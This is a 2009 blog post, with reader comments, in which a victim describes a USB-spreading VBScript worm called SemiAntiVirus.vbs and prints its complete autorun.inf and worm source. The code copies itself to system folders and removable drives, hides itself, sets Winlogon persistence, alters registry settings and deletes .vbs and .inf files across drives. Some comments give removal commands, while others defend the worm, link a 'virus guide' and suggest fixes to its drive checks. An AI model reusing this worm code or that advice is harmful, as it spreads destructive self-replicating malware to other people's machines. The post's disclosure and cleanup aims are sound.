Thursday, January 22, 2009

Dear SemiAntiVirus.vbs, you are gladly welcome to my machine !

mm well I'm proud to announce that I do not use an anti virus guard or a virus removal tool or anything of that kind. In my computer, it is all about manual virus removal or rather prevention.

But yesterday, I came across this damn thing which does awful things like changing the folder settings. I have set folder settings to show the hidden files, but in few seconds it was changed into do not show hidden files and folders.

soooo, after all, my computer too was infected. It was a quick virus/worm I say. I was trying to format a USB drive and suddenly,it was there!!

Here is the script if any one is interested.


This is the auto run file

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests

1.Opening
2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting

Interesting!!

The actual virus script which can be found in c:windows\system32\semiantivirus.vbs

To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub




i am still tring to find a way to remove this. the vbs file cannot be deleted as it says that it is being used by another program.

mm and the best part is it doesnot allow another AVG to be installed in the machine. i tried to install Avast, but the moment the setup.exe loads, the machine restarts.

cooool, keep in touch, i'll post how to remove it if i find a way.

untill then, have fun!!

PS:: if you know any way to remove this, please you are more than welcome



21 comments:

  1. yuho!! there are many things coming in. the IE title bar is changed into LRI internet explorer.(if you lok at the virus script carefull you can see more)..hehee feel like, im learning how to read a virus script

    ReplyDelete
  2. Thanks for putting the code in your blog coz I'm pretty much interested in such coding stuff. Now I'm checking it.

    ReplyDelete
  3. you are welcome brother!! have a look, yh, it is pretty interesting!

    ReplyDelete
  4. Thanks for the information!
    I never had the idea of the Format thing. It looks like Windows Explorer is very very unsafe.
    Use the command prompt (cmd.exe) to format disks, rather than using the Windows Explorer. It' the safe option.
    Eg:
    format e: /fs:fat32 /v deeps_usb /x
    For more info:
    format /?

    ---

    I read your script. It looks like it has some basic antivirus capability, but it itself acts as a virus. Looks like this baby doesn't like to coexist with other viruses.

    Open a command prompt and enter the following lines one after one. (You can copy-paste)

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f

    For more information, try:
    reg
    reg add /?

    ReplyDelete
  5. One more thing:
    Open a command prompt, enter the following commands one after one:
    c:
    cd\
    attrib -s -h autorun.inf
    attrib -s -h semiantivirus.vbs
    d:
    cd\
    attrib -s -h autorun.inf
    attrib -s -h semiantivirus.vbs

    Repeat the procedure for all your disks including removable and floppy disks, but not CD/ DVD. And then,

    cd %systemroot%\system32
    attrib -s -h semiantivirus.vbs

    cd ..
    attrib -s -h semiantivirus.vbs

    Now you should be able to navigate through the Windows Explorer and delete these files. When using Windows Explorer, consider these instructions.

    ReplyDelete
  6. @ shaakunthala(with regard to the following commands)

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f

    reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f


    I have already changed the home page manually in IE settings and tried to change the title bar using command prmpt. But changing the title bar of the IE is not possible, it says that the system cannot find the path specified.

    So i tried to use registry editor to edit it. to my dismay, there was no entry called HKCU\Software\Microsoft\Internet Explorer\Main\Window Title
    under main, there are only 3 entries. Namely
    ErrorThresholds
    FeatureControl
    and
    UrlTemplate

    check the virus code.

    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
    i think this has something to do with it

    windows is not at all safe it seems!!

    (with regard to deleting the virus files)
    there are no files in my machine now. i have deleted them all. after deleting only I got this annoying pop up at the start up

    ReplyDelete
  7. i have made a mistake in registry editor..hehehe now all the things are working properly..thanks for the help

    ReplyDelete
  8. Hi deep, its me Rajkumar...
    Actually its not the virus,, it's like an antivirus.. and doesn't let the usb virus to attack the computer...
    U can use it in more secure way than any other antivirus..
    Rajkumar

    ReplyDelete
  9. @Anonymous (Rajkumar),
    Anything that runs and spreads without your proper permission is potentially a virus.

    ReplyDelete
  10. oh.. sorry for that...
    but as i told... i had made it for my personal use....
    i don't know how it transfered...
    Neither i have kept it in net..
    I m from nepal and i don't know how did it transfer to srilanka...
    but sory for that...

    ReplyDelete
  11. No buddy, no need to say sorry. :)

    There are some auto replicating scripts that show up as anti-virus programs. Most of the time these scripts are adware. They do minor changes in your system such as changing your Internet Explorer home page and likewise.

    ReplyDelete
  12. @Anonymous

    hey, no need to say sorry. when i was writing the post, i did some research with the data provided in the disclaimer part of the script. it led me to this school as the place of origin of the virus.


    http://www.glocalnepal.com/lrischool

    so, i already knew that its from Nepal ;-P

    well, the browser name still changes to LRI if you run this on a machine. It means to me that the original script itself has come to

    sri lanka
    Australia
    India
    Saudi Arabia
    Sao Paulo
    USA
    Singapore
    Hefa etc etc according to my web analyzer's data.

    and yes, agree with you ශාකුන්තල Anything that runs and spreads without your proper permission is potentially a virus and that is why people from all over the world Google to find a way to remove it.

    you may have created it for your personal use but however, it is leaked and now affecting lot of computers in many countries.

    ReplyDelete
  13. ok, use a custom kernel compiled by your self..which disabled the USB ports...or adding extra protections for /dev/sdb*....

    ReplyDelete
  14. @Rajkumar -- your virus script is a stupid idea.

    I got a version of it. I thjink it's all over the world.

    http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403

    Don't screw up other people's computers!

    ReplyDelete
  15. Well, he's just a kid.
    Taking into account where he lives and his age, he's brilliant.

    I can feel the way he thinks, as I have also passed that age.

    Giving him some helping hand with some sociological aspects, law and ethics as well would eventually build an ethical hacker. :-)

    ReplyDelete
  16. agree with shaakunthala on the comment of david

    ReplyDelete
  17. @David Zetland : You told that its every where... look in you link..

    http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403

    Look in the function

    sub delt(fPath, fName, kil)
    dim fSys, Delet, Wri, raj

    Raj is my name... and i have declared it as my variable...
    He is a cheater and copied my code...
    haha

    Rajkumar

    ReplyDelete
  18. @Rajkumar

    That wscript.exe 'no disk' error is caused because may be you didnot keep a check for filtering and preventing 'A:' (Floppy infection) or the filter code in your script is not working. It happened to me too once in my script and it turned out to be the Script trying to find and infect Floppy Device which ofcourse is never ready these days.
    Make sure you add the Floppy Filter properly.
    ____________________________________
    Here is a virus guide. It spreads from Pendrives and open Network drives.

    http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
    ____________________________________

    Well, most of the people think there are no hackers in Nepal. Well I'd like to proudly state that they are wrong. I'm one of the Nepalese Hackers and so is this Script Writer.

    ReplyDelete
  19. Visit this:

    http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html

    ReplyDelete
  20. @anonymos: well that's not my problem.. i don't think, nowadays floppy will be used... i don't use them, so i havn't used filter for Floppy... but its easy... need to add 2-3 lines..
    And also abt nepali hackers nd script writer, i don't think they r lyk other hackers.... m too nepali and make script, software... they jus lyk to copy it without reference nd i don't lyk it... for exmple.. this was my own creation... i have seen many of them copying it.. editing it... but no reference.. jus some of my variable have not been edited yet nd that's the proof...

    ReplyDelete
  21. This post is invaluable. Where can I find out more?


    my weblog - Pur Essence Skin Care

    ReplyDelete